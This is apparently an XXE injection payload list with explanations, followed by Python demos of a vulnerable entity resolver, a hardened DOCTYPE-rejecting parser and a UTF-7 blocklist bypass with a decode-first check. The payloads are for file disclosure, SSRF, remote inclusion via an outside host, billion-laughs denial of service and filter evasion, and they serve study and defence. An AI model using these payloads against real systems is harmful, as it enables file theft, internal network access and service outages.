XML (XXE) Injection Payload List
This section explains what XML external entity (XXE) injection is, lists the main attack types, and collects example payloads.

What is XXE injection?

XML external entity injection (XXE) is a web security vulnerability that lets an attacker interfere with an application's processing of XML data. It typically lets the attacker read files on the application server's file system and interact with any back-end or external system that the application itself can reach. In some cases an attacker can escalate an XXE attack by using it to perform server-side request forgery (SSRF), compromising the underlying server or other back-end infrastructure.

XXE attack types:

Exploiting XXE to retrieve files: an external entity is defined containing the contents of a file, and its value is returned in the application's response.
Exploiting XXE to perform SSRF attacks: an external entity is defined based on a URL to a back-end system.
Exploiting blind XXE to exfiltrate data out-of-band: sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to retrieve data via error messages: the attacker triggers a parsing error message that contains sensitive data.

XML (XXE) injection payloads

Each entry names a payload from the list and shows the text that appears in the document body; the entity reference (the &name; token) is the part the parser expands, everything before it is ordinary content.

XXE: Basic XML Example (a well-formed document with no entity declarations)
    John Doe

XXE: Entity Example (an internal entity named example, declared in the DTD and referenced in the body)
    John &example;

XXE: File Disclosure (an external entity named ent whose SYSTEM identifier points at a file on the server; the file's contents are returned where &ent; appears)
    John &ent;

XXE: Denial-of-Service Example ("billion laughs": nested internal entities lol1 to lol9, each consisting of many references to the previous one, so the single reference &lol9; expands exponentially; the fragment shows the end of one such declaration followed by the body reference)
    &lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">>&lol9;

XXE: Local File Inclusion Example (external entity xxe whose SYSTEM identifier is a local file)
    &xxe;

XXE: Blind Local File Inclusion Example (used when the first case returns nothing in the response)
    &blind;

XXE: Access Control Bypass (loading restricted resources, PHP example: an external entity named ac fetches a resource that the attacker could not request directly)
    &ac;

XXE: SSRF (Server Side Request Forgery) Example (external entity xxe whose SYSTEM identifier is a URL to an internal service, so the server makes the request on the attacker's behalf)
    &xxe;

XXE: Remote Attack (through external XML inclusion) Example (external entity test loaded from an XML file on a remote host; note that the list writes the reference as &test without the closing semicolon)
    3..2..1...&test

XXE: UTF-7 Example (the SYSTEM-entity payload encoded as UTF-7, so that filters matching on the literal strings <!DOCTYPE or <!ENTITY do not see them; the document's XML declaration must announce encoding UTF-7 for the parser to decode it)
    +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
    +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
    +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

Decoded, this is a DOCTYPE for element foo that declares the external entity xxe as SYSTEM "http://hack-r.be:1337", followed by the body <foo>&xxe;</foo>.

The list also carries three further variants: a Base64-encoded payload, XXE inside a SOAP envelope, and XXE inside an SVG image.

Reference: https://github.com/payloadbox/xxe-injection-payload-list (previous section: SQL Injection Payload List).
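As an added example (mine, not part of the payload list or of the payloadbox project), the Python program below shows what a parser does with the File Disclosure / Local File Inclusion and Denial-of-Service payloads above, and what the hardened configuration looks like. It uses only the standard library's expat binding; the "secret" file, its path and the XML documents are constructed inline, and the file:// resolver is a deliberately naive stand-in for the resolver a real parser ships with (this one follows file:// only, a real one would also follow http:// and wrapper schemes).

```python
import os
import tempfile
import xml.parsers.expat as expat


class DtdRejected(Exception):
    """Raised by the hardened configuration as soon as a DTD is declared."""


def parse_text(xml_bytes, resolve_external=False, allow_dtd=True):
    """Parse xml_bytes with expat and return all character data as one string.

    resolve_external=True reproduces the vulnerable configuration: the parser
    fetches whatever the SYSTEM identifier inside the document points at and
    splices it into the output (the File Disclosure / LFI payloads).
    allow_dtd=False is the hardened configuration: the first <!DOCTYPE ...>
    aborts parsing, so no entity can be declared, let alone expanded.
    """
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    if not allow_dtd:
        def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
            raise DtdRejected("refusing document with <!DOCTYPE %s>" % doctype_name)
        parser.StartDoctypeDeclHandler = reject_doctype

    if resolve_external:
        def fetch_external_entity(context, base, system_id, public_id):
            # Vulnerable: trusts a location chosen by whoever wrote the document.
            path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
            with open(path, "rb") as fh:
                content = fh.read()
            # The fetched bytes are parsed as the entity's text; their character
            # data lands in the same chunks list as the rest of the document.
            sub = parser.ExternalEntityParserCreate(context)
            sub.CharacterDataHandler = chunks.append
            sub.Parse(content, True)
            return 1  # non-zero tells expat the reference was handled
        parser.ExternalEntityRefHandler = fetch_external_entity

    parser.Parse(xml_bytes, True)
    return "".join(chunks)


def rejects(xml_bytes):
    """True if the hardened configuration refuses xml_bytes outright."""
    try:
        parse_text(xml_bytes, allow_dtd=False)
    except DtdRejected:
        return True
    return False


def file_disclosure_payload(path):
    """The Local File Inclusion payload shape: external entity xxe -> file://path."""
    return ('<?xml version="1.0"?>'
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://%s">]>'
            '<foo>&xxe;</foo>' % path).encode()


def demo_file_disclosure(secret_text="root:x:0:0:root:/root:/bin/bash\n"):
    """Write a constructed 'secret' file (stand-in for /etc/passwd), then parse the
    payload against it. Returns (text leaked by the vulnerable configuration,
    whether the hardened configuration rejected the document)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(secret_text)
        path = fh.name
    try:
        payload = file_disclosure_payload(path)
        leaked = parse_text(payload, resolve_external=True)
        return leaked, rejects(payload)
    finally:
        os.unlink(path)


def laughs(depth, fanout=10):
    """A scaled-down Denial-of-Service payload: lol0 = "lol" and each lolN is
    fanout references to lol(N-1), so &lolN; expands to 3 * fanout**depth bytes
    of text from a document only a few hundred bytes long."""
    decls = ['<!ENTITY lol0 "lol">']
    for n in range(1, depth + 1):
        decls.append('<!ENTITY lol%d "%s">' % (n, ("&lol%d;" % (n - 1)) * fanout))
    doc = '<?xml version="1.0"?><!DOCTYPE lolz [%s]><lolz>&lol%d;</lolz>' % ("".join(decls), depth)
    return doc.encode()


if __name__ == "__main__":
    leaked, blocked = demo_file_disclosure()
    print("vulnerable configuration returned:", repr(leaked))
    print("hardened configuration rejected payload:", blocked)
    bomb = laughs(3)
    print("%d-byte document expands to %d bytes of text" % (len(bomb), len(parse_text(bomb))))
```

Two things worth noticing when running it. With no resolver installed at all (the default arguments), expat simply drops the external reference and returns an empty string, which is why the same payload leaks nothing from Python's xml.etree but leaks everything from a parser whose defaults resolve entities; the application's parser configuration, not the payload, decides. And refusing the DOCTYPE outright is the only setting that stops both the file read and the entity expansion, because the internal "lol" entities never touch a resolver.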
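The UTF-7 entry is a filter-evasion technique rather than a new parser trick. As an added example (mine, not from the list), the Python code below shows a byte-level blocklist missing that payload and the decode-before-inspect check that catches it; the XML declaration line that selects UTF-7 and the benign comparison document are assumptions constructed here, the encoded body is the one from the list.

```python
import re

# The UTF-7 payload from the list, preceded by the XML declaration an attacker
# would send so the parser selects UTF-7 (the declaration line is assumed
# here; the list shows only the encoded body).
UTF7_PAYLOAD = (
    b'<?xml version="1.0" encoding="UTF-7"?>\n'
    b'+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4\n'
    b'+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+\n'
    b'+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4'
)

# Constructed benign document for comparison.
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?>\n<foo>John Doe</foo>'

DTD_MARKERS = ("<!DOCTYPE", "<!ENTITY")
_XML_DECL = re.compile(rb'\s*<\?xml[^>]*?encoding\s*=\s*["\']([A-Za-z0-9._-]+)["\']')


def naive_has_dtd(raw):
    """Byte-level blocklist, as in many WAF rules and input filters: looks for
    the markers in the bytes exactly as received."""
    upper = raw.upper()
    return any(marker.encode() in upper for marker in DTD_MARKERS)


def declared_encoding(raw, default="utf-8"):
    """Encoding named in the XML declaration, or default when there is none.
    The declaration itself is plain ASCII in UTF-7 and UTF-8 documents, so it
    can be read before decoding (UTF-16 input would need BOM handling first)."""
    match = _XML_DECL.match(raw)
    return match.group(1).decode().lower() if match else default


def decode_payload(raw):
    """The text the XML parser will actually work on."""
    return raw.decode(declared_encoding(raw))


def decoded_has_dtd(raw):
    """Decode with the declared encoding first, then inspect that text."""
    upper = decode_payload(raw).upper()
    return any(marker in upper for marker in DTD_MARKERS)


if __name__ == "__main__":
    print(decode_payload(UTF7_PAYLOAD))
    print("naive filter:", naive_has_dtd(UTF7_PAYLOAD),
          " decode-first:", decoded_has_dtd(UTF7_PAYLOAD))
```

The lesson generalises beyond UTF-7: any check that runs on bytes in one encoding while the parser reads them in another can be bypassed, so the inspection has to see exactly what the parser sees, or, better, the parser has to be configured to refuse DTDs so that no inspection is needed.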